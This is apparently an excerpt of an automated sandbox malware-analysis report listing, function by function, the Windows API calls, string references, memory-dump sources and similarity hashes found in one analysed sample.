GetSystemMetrics.USER32(0000000F), ref: 007CD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007CD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007CD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007CD716
ShowWindow.USER32(00000003,00000000), ref: 007CD735
InvalidateRect.USER32(?,00000000,00000001), ref: 007CD75A
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 007CD77D

Strings

@U=u, xrefs: 007CD6F5, 007CD716

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
String ID: @U=u
API String ID: 830902736-2594219639
Opcode ID: beb9f837e9b795a532705d9f76d8305a29e89e23ea9fb2e434350a16c085cb87
Instruction ID: 3a0ec540e63dcc2e67df27d3903503a7382dd9235600266690612367736c51e4
Opcode Fuzzy Hash: beb9f837e9b795a532705d9f76d8305a29e89e23ea9fb2e434350a16c085cb87
Instruction Fuzzy Hash: 1EB17B71600625EBDF24CF68C985BAA7BB1BF48711F08C07DED48AB295D778AD50CB60

Function 007B83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

CoInitialize.OLE32 ref: 007B8403
CoUninitialize.COMBASE ref: 007B840E
CoCreateInstance.COMBASE(?,00000000,00000017,007D2BEC,?), ref: 007B846E
IIDFromString.COMBASE(?,?), ref: 007B84E1
VariantInit.OLEAUT32(?), ref: 007B857B
VariantClear.OLEAUT32(?), ref: 007B85DC

Strings

NULL Pointer assignment, xrefs: 007B84B3
Failed to create object, xrefs: 007B8479, 007B852F
Invalid parameter, xrefs: 007B84FA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 99e59d2900ce7cdf389889a776c108234ce45031147560889743c3c761ebaa86
Instruction ID: 1058c12f55eacf259825e1599ff0e6353c935fdc4b623bb96844b90a4d3e23e4
Opcode Fuzzy Hash: 99e59d2900ce7cdf389889a776c108234ce45031147560889743c3c761ebaa86
Instruction Fuzzy Hash: CE619C70608312EFC760DF64C848FAABBE8AF49754F144419F9859B291CB78ED44CB93

Function 007B4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007B418B
EmptyClipboard.USER32 ref: 007B4191
GlobalAlloc.KERNEL32(00000002,?), ref: 007B41A6
CloseClipboard.USER32 ref: 007B4245

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: bba862f54e37fb99ca164fad6ba0e54740fe2c2246f445c5d4dc6830cd46f39f
Instruction ID: 944527ad5f9f0b9c3b7aa54eacd31e16900be9ddaf1a4cff6e0dccc33e45744b
Opcode Fuzzy Hash: bba862f54e37fb99ca164fad6ba0e54740fe2c2246f445c5d4dc6830cd46f39f
Instruction Fuzzy Hash: 4E218635600214DFDB109F54DC09FAE7BA9FF44711F108029F945DB262DB38AC01CB58

Function 007A37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00744750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00744743,?,?,007437AE,?), ref: 00744770

Part of subcall function 007A4A31: GetFileAttributesW.KERNEL32(?,007A370B), ref: 007A4A32

FindFirstFileW.KERNEL32(?,?), ref: 007A38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007A394B
MoveFileW.KERNEL32(?,?), ref: 007A395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007A397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 007A399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 007A39B9

Strings

\*.*, xrefs: 007A384E, 007A3857, 007A386C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 6776c6e22509a38a16d4248cdc5f1358379075d3c28d840a3d987f2d2442d6f7
Instruction ID: 17aafcc477b9ecc9dc11da8e7cdf2fc1c6ed6f4a7a4fcc88762e17126dfda425
Opcode Fuzzy Hash: 6776c6e22509a38a16d4248cdc5f1358379075d3c28d840a3d987f2d2442d6f7
Instruction Fuzzy Hash: 82517C3180514CEACF05EFA0C996DEEB779AF56304F604269F406B6192EF396F09CB61

Function 007AF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007AF440
Sleep.KERNEL32(0000000A), ref: 007AF470
_wcscmp.LIBCMT ref: 007AF484
_wcscmp.LIBCMT ref: 007AF49F
FindNextFileW.KERNEL32(?,?), ref: 007AF53D
FindClose.KERNEL32(00000000), ref: 007AF553

Strings

*.*, xrefs: 007AF425

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 6863d174d1d649bb3305d920c9fcc278df9a8b9eedfeab922966f8b6e34bdab4
Instruction ID: 3f3f85c4aba006ca4a9a96d85ac0c317f3b75887da836359382cf8f59b26465b
Opcode Fuzzy Hash: 6863d174d1d649bb3305d920c9fcc278df9a8b9eedfeab922966f8b6e34bdab4
Instruction Fuzzy Hash: 74413C71D00219DBCF14EFA4DC59AEEBBB4FF45310F14466AE815A2191DB389E54CB50

Function 00753030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_u, xrefs: 00753322
3cu, xrefs: 00753225

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cu$_u
API String ID: 674341424-3001241828
Opcode ID: 256f9c790b1f256c661df08fd870ff93a73f32705c8fa5ebb3ebfcaacac8f133
Instruction ID: f6c84b5bb6e25a4173e4d6137dd8ad6cd3e13bf5582867a069e285513997d5b5
Opcode Fuzzy Hash: 256f9c790b1f256c661df08fd870ff93a73f32705c8fa5ebb3ebfcaacac8f133
Instruction Fuzzy Hash: 8F228B71608340DFC724EF24C895BAFB7E5AF84750F00491DF99A97291DBB9E908CB92

Function 0079E616 Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0079E628

Strings

(, xrefs: 0079E66E
Release, xrefs: 0079E946
|, xrefs: 0079E658
AddRef, xrefs: 0079E8FE
InterfaceDispatch, xrefs: 0079E7DE
QueryInterface, xrefs: 0079E871

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: lstrlen
String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
API String ID: 1659193697-2318614619
Opcode ID: 8ea5eb7c651e23c8e584882c3fad213c58e03090bb6fc1514cecb13c96a9904b
Instruction ID: d594b1dea6ce76fddd5f31f52b812a7a677de830f81674dad52bede196e731ce
Opcode Fuzzy Hash: 8ea5eb7c651e23c8e584882c3fad213c58e03090bb6fc1514cecb13c96a9904b
Instruction Fuzzy Hash: 64322475A00705DFDB28CF59D481A6AB7F0FF48320B15C56EE89ADB3A1EB74A941CB40

Function 00755760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007558A5
_memmove.LIBCMT ref: 007558F5
_memmove.LIBCMT ref: 0075595B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 10ac55dae4b2a9859fd3cfbc8103067cccf24b410b165a18dcab3ebe3c621a9a
Instruction ID: a3a20d1faf6d94ae34cea18f1e8d1c197985a11f6c9314659250855ac6e40bac
Opcode Fuzzy Hash: 10ac55dae4b2a9859fd3cfbc8103067cccf24b410b165a18dcab3ebe3c621a9a
Instruction Fuzzy Hash: 61128970A00609DFDF04DFA5D995AEEB7F5FF48310F108529E806E7251EB7AA924CB90

Function 007A51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079882B
Part of subcall function 007987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798858
Part of subcall function 007987E1: GetLastError.KERNEL32 ref: 00798865

ExitWindowsEx.USER32(?,00000000), ref: 007A51F9

Strings

, xrefs: 007A51E7
SeShutdownPrivilege, xrefs: 007A51C9
@, xrefs: 007A51EC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 52289df38efb6eb6b2cc9cc972aacae6bb700ac3b8a77b6115b25802223b28ec
Instruction ID: 034b5ff36899f5ae4daa652bf93002babed7a86c1441d39decc6ed53ae2ebb2f
Opcode Fuzzy Hash: 52289df38efb6eb6b2cc9cc972aacae6bb700ac3b8a77b6115b25802223b28ec
Instruction Fuzzy Hash: 1801F7B16916156BE7286768AC8AFBA7358FB87750F200625F913E20D2D95D1C008694

Function 007B6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 007B62DC
WSAGetLastError.WS2_32(00000000), ref: 007B62EB
bind.WS2_32(00000000,?,00000010), ref: 007B6307
listen.WS2_32(00000000,00000005), ref: 007B6316
WSAGetLastError.WS2_32(00000000), ref: 007B6330
closesocket.WS2_32(00000000), ref: 007B6344

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 904f444eed71975d6f5ce1c872b56fe9c2f211905d30d1fb9ddb34ad443d135c
Instruction ID: 3f2743698492a984211bd25c6fae77196cb02c9988a3d815be0a8fd314731ff0
Opcode Fuzzy Hash: 904f444eed71975d6f5ce1c872b56fe9c2f211905d30d1fb9ddb34ad443d135c
Instruction Fuzzy Hash: B5218075600204DFCB10EF68DC49FAEB7EAEF49720F148259EA56A7391C778AD01CB51

Function 00755520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00760DB6: std::exception::exception.LIBCMT ref: 00760DEC
Part of subcall function 00760DB6: __CxxThrowException@8.LIBCMT ref: 00760E01

_memmove.LIBCMT ref: 00790258
_memmove.LIBCMT ref: 0079036D
_memmove.LIBCMT ref: 00790414

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 9413da77c57d2c16854e671c0fa57c5a009365a5581c64a64f7e5795541ac009
Instruction ID: 1dc9aeca556264717e4bafc9587be020a23f0dd0465643cb3f1553c83d42f71f
Opcode Fuzzy Hash: 9413da77c57d2c16854e671c0fa57c5a009365a5581c64a64f7e5795541ac009
Instruction Fuzzy Hash: 4A02CEB0A10209DFCF04DF64E995ABEBBB5FF44300F148469E80ADB255EB39D954CB91

Function 00741287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 007419FA
GetSysColor.USER32(0000000F), ref: 00741A4E
SetBkColor.GDI32(?,00000000), ref: 00741A61

Part of subcall function 00741290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007412D8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ColorDialogNtdllProc_$LongWindow
String ID:
API String ID: 591255283-0
Opcode ID: 41de99259796a65225f245aaded18dbb5bf1fb650f4ace50e2ec0e9abe06daa6
Instruction ID: 1c2a2476dbe0d2b8dd80939165bd1afbd0caf7725f61e71029d6a887ff2dfb64
Opcode Fuzzy Hash: 41de99259796a65225f245aaded18dbb5bf1fb650f4ace50e2ec0e9abe06daa6
Instruction Fuzzy Hash: 3CA15971202584FAEA28BF384C4CF7F2B5DEF42385B95C11DF506D2192CB2CAD8196B6

Function 007B6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007B7D8B: inet_addr.WS2_32(00000000), ref: 007B7DB6

socket.WS2_32(00000002,00000002,00000011), ref: 007B679E
WSAGetLastError.WS2_32(00000000), ref: 007B67C7
bind.WS2_32(00000000,?,00000010), ref: 007B6800
WSAGetLastError.WS2_32(00000000), ref: 007B680D
closesocket.WS2_32(00000000), ref: 007B6821

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 52350204ebaff478fd0e87864698fffbb96668ec41d80c8eb1df4054ddfa25b8
Instruction ID: ecb0ec49c58c2ce8028a25fcb3654fb8e6fb8749305bd960f00a7901745f210f
Opcode Fuzzy Hash: 52350204ebaff478fd0e87864698fffbb96668ec41d80c8eb1df4054ddfa25b8
Instruction Fuzzy Hash: 6441B175B00204AFDB50BF288C8AF6E77E99B49714F04855CFA15AB3D2CB789D008B91

Function 007C5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007C53C5
IsWindowEnabled.USER32 ref: 007C53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 007C53E0
IsIconic.USER32 ref: 007C53EE
IsZoomed.USER32 ref: 007C53FC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: a0a2035359ae5dbbe6349db1b1b3c14781720600f41e9c57eeb06d665c354b9c
Instruction ID: 09f40e3e57a668c08004c6c0f6ffcbbe3966950d5c6af4cd1e891cc464d2cea6
Opcode Fuzzy Hash: a0a2035359ae5dbbe6349db1b1b3c14781720600f41e9c57eeb06d665c354b9c
Instruction Fuzzy Hash: F311B231300951AFDB216F26DC48F6B7B9DEF847A5B40802DF846D3241DBBDED4186A4

Function 007980A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007980C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007980CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007980D9
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007980E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007980F6

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 860a330df1206adf214e462e5e6c6925eb4d8d47667390714a5ee3b051756abb
Instruction ID: 03c6c1080964208c59e1a6b6de21d52590b0e7251550709a0b624482c87057f0
Opcode Fuzzy Hash: 860a330df1206adf214e462e5e6c6925eb4d8d47667390714a5ee3b051756abb
Instruction Fuzzy Hash: 59F06231240208BFEB101FA5EC8DE673FBDFF4A755B14402DF945D6150CB699C41DA61

Function 007BEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007BEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 007BEE4B

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Process32NextW.KERNEL32(00000000,?), ref: 007BEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 007BEF1A

Memory Dump Source

